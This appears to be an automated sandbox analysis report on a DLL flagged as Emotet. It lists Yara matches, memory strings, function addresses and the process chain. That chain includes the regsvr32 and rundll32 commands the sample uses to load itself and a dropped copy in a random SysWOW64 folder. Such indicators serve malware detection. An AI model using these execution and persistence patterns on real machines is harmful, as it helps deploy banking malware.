Source: svchost.exe, 0000000E.00000003.565704127.0000023F14819000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564883544.0000023F14388000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564185932.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.565394424.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564280175.0000023F14802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564163015.0000023F1439A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564576094.0000023F14803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 0000000E.00000003.571353182.0000023F14388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000000E.00000003.571353182.0000023F14388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000000E.00000003.565704127.0000023F14819000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564883544.0000023F14388000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564185932.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.565394424.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564280175.0000023F14802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564163015.0000023F1439A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564576094.0000023F14803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 0000000E.00000003.565704127.0000023F14819000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564883544.0000023F14388000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564185932.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.565394424.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564280175.0000023F14802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564163015.0000023F1439A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564576094.0000023F14803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.pango.co/privacy

Source: loaddll32.exe, 00000000.00000002.416924605.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10020E85 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		2_2_10020E85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10020E85 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		3_2_10020E85

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 2.2.regsvr32.exe.4f00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.46b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4f00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.c20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.bf0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4f60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.2b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.406595295.0000000000BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.917544011.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.406621589.00000000046B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.917618972.0000000004481000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.414918130.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.406594585.0000000004680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: 6xfFjxyRXf.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

Source: C:\Windows\SysWOW64\regsvr32.exe

File deleted: C:\Windows\SysWOW64\Nrzawqzutwib\qenu.dlv:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Windows\SysWOW64\Nrzawqzutwib\

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10015257	2_2_10015257
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100115BC	2_2_100115BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10021F04	2_2_10021F04
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1000DF4C	2_2_1000DF4C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7E4B2	2_2_04F7E4B2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F785A7	2_2_04F785A7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F69587	2_2_04F69587
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6E51F	2_2_04F6E51F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F656AD	2_2_04F656AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7202D	2_2_04F7202D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6C26D	2_2_04F6C26D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7FC6F	2_2_04F7FC6F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7DC5F	2_2_04F7DC5F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F66C5E	2_2_04F66C5E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F69DE0	2_2_04F69DE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F73EE6	2_2_04F73EE6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F77EB9	2_2_04F77EB9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F76F79	2_2_04F76F79
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F70F57	2_2_04F70F57
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6BB44	2_2_04F6BB44
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F73B17	2_2_04F73B17
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F724F9	2_2_04F724F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F654B9	2_2_04F654B9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7B45C	2_2_04F7B45C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6D5D6	2_2_04F6D5D6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F775AD	2_2_04F775AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F80559	2_2_04F80559
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6A528	2_2_04F6A528
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F686ED	2_2_04F686ED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7D6A7	2_2_04F7D6A7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7169D	2_2_04F7169D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F75689	2_2_04F75689
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F74658	2_2_04F74658
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6260B	2_2_04F6260B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7F7FE	2_2_04F7F7FE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F637FA	2_2_04F637FA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6A7C4	2_2_04F6A7C4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F73711	2_2_04F73711
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7E71C	2_2_04F7E71C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6B704	2_2_04F6B704
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7A0F3	2_2_04F7A0F3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F760FA	2_2_04F760FA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7B0A4	2_2_04F7B0A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F74093	2_2_04F74093
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7F05E	2_2_04F7F05E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F63023	2_2_04F63023
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7001B	2_2_04F7001B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F691D6	2_2_04F691D6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F701BF	2_2_04F701BF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7E10C	2_2_04F7E10C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F732C5	2_2_04F732C5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F642B2	2_2_04F642B2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7C234	2_2_04F7C234
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6E214	2_2_04F6E214
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6A203	2_2_04F6A203
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F753D5	2_2_04F753D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7630A	2_2_04F7630A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F71DCF	2_2_04F71DCF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7BDB0	2_2_04F7BDB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F68DA4	2_2_04F68DA4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F65D99	2_2_04F65D99
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F78D6C	2_2_04F78D6C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F75D5E	2_2_04F75D5E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F61D5C	2_2_04F61D5C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F74D2B	2_2_04F74D2B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F62EF6	2_2_04F62EF6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6CED3	2_2_04F6CED3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F63FE5	2_2_04F63FE5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F78FB0	2_2_04F78FB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F72FB9	2_2_04F72FB9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7FFAC	2_2_04F7FFAC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7BF4C	2_2_04F7BF4C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7D8FE	2_2_04F7D8FE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6D8E0	2_2_04F6D8E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6F88D	2_2_04F6F88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7481A	2_2_04F7481A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F759FA	2_2_04F759FA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6A9D2	2_2_04F6A9D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F619C8	2_2_04F619C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7E947	2_2_04F7E947
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6E942	2_2_04F6E942
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6593C	2_2_04F6593C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F77915	2_2_04F77915
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7BA7C	2_2_04F7BA7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F64A11	2_2_04F64A11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F7CBE5	2_2_04F7CBE5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F69BDE	2_2_04F69BDE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6FBDD	2_2_04F6FBDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6DB9B	2_2_04F6DB9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10015257	3_2_10015257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100115BC	3_2_100115BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10021F04	3_2_10021F04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000DF4C	3_2_1000DF4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3202D	3_2_00C3202D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2C26D	3_2_00C2C26D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C29587	3_2_00C29587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C385A7	3_2_00C385A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2E51F	3_2_00C2E51F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C256AD	3_2_00C256AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3DC5F	3_2_00C3DC5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C26C5E	3_2_00C26C5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C29DE0	3_2_00C29DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C33EE6	3_2_00C33EE6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C37EB9	3_2_00C37EB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3A0F3	3_2_00C3A0F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C360FA	3_2_00C360FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C34093	3_2_00C34093
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3B0A4	3_2_00C3B0A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3F05E	3_2_00C3F05E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3001B	3_2_00C3001B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C23023	3_2_00C23023
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C291D6	3_2_00C291D6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C301BF	3_2_00C301BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3E10C	3_2_00C3E10C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C332C5	3_2_00C332C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C242B2	3_2_00C242B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2A203	3_2_00C2A203
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2E214	3_2_00C2E214
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3C234	3_2_00C3C234
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C353D5	3_2_00C353D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3630A	3_2_00C3630A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C324F9	3_2_00C324F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3E4B2	3_2_00C3E4B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C254B9	3_2_00C254B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3B45C	3_2_00C3B45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2D5D6	3_2_00C2D5D6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C375AD	3_2_00C375AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C40559	3_2_00C40559
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2A528	3_2_00C2A528
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C286ED	3_2_00C286ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C35689	3_2_00C35689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3169D	3_2_00C3169D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3D6A7	3_2_00C3D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C34658	3_2_00C34658
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2260B	3_2_00C2260B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2A7C4	3_2_00C2A7C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C237FA	3_2_00C237FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3F7FE	3_2_00C3F7FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2B704	3_2_00C2B704
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C33711	3_2_00C33711
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3E71C	3_2_00C3E71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2D8E0	3_2_00C2D8E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3D8FE	3_2_00C3D8FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2F88D	3_2_00C2F88D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3481A	3_2_00C3481A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C219C8	3_2_00C219C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2A9D2	3_2_00C2A9D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C359FA	3_2_00C359FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2E942	3_2_00C2E942
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3E947	3_2_00C3E947
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C37915	3_2_00C37915
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2593C	3_2_00C2593C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3BA7C	3_2_00C3BA7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C24A11	3_2_00C24A11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C29BDE	3_2_00C29BDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2FBDD	3_2_00C2FBDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3CBE5	3_2_00C3CBE5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2DB9B	3_2_00C2DB9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2BB44	3_2_00C2BB44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C33B17	3_2_00C33B17
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3FC6F	3_2_00C3FC6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C31DCF	3_2_00C31DCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C25D99	3_2_00C25D99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C28DA4	3_2_00C28DA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3BDB0	3_2_00C3BDB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C35D5E	3_2_00C35D5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C21D5C	3_2_00C21D5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C38D6C	3_2_00C38D6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C34D2B	3_2_00C34D2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2CED3	3_2_00C2CED3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C22EF6	3_2_00C22EF6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C23FE5	3_2_00C23FE5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3FFAC	3_2_00C3FFAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C38FB0	3_2_00C38FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C32FB9	3_2_00C32FB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C3BF4C	3_2_00C3BF4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C30F57	3_2_00C30F57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C36F79	3_2_00C36F79

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10012CE0 appears 48 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10011A8C appears 120 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10023100 appears 31 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10012CE0 appears 48 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10011A8C appears 120 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10023100 appears 31 times

Source: 6xfFjxyRXf.dll

Binary or memory string: OriginalFilenameProcess Viewer.exe vs 6xfFjxyRXf.dll

Source: 6xfFjxyRXf.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior

Source: 6xfFjxyRXf.dll

Virustotal: Detection: 69%

Source: 6xfFjxyRXf.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6xfFjxyRXf.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6xfFjxyRXf.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Nrzawqzutwib\qenu.dlv"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6xfFjxyRXf.dll,DllUnregisterServerrrrrrrrrrrr
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6xfFjxyRXf.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6xfFjxyRXf.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6xfFjxyRXf.dll,DllUnregisterServerrrrrrrrrrrr	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Nrzawqzutwib\qenu.dlv"	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal92.troj.evad.winDLL@18/2@0/37

Source: C:\Windows\SysWOW64\regsvr32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10006650 CreateToolhelp32Snapshot,Process32First,SendMessageA,SendMessageA,SendMessageA,OpenProcess,TerminateProcess,CloseHandle,SendMessageA,SendMessageA,Process32Next,CloseHandle,Sleep,

2_2_10006650

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll",#1

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10005FD0 LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,

2_2_10005FD0

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
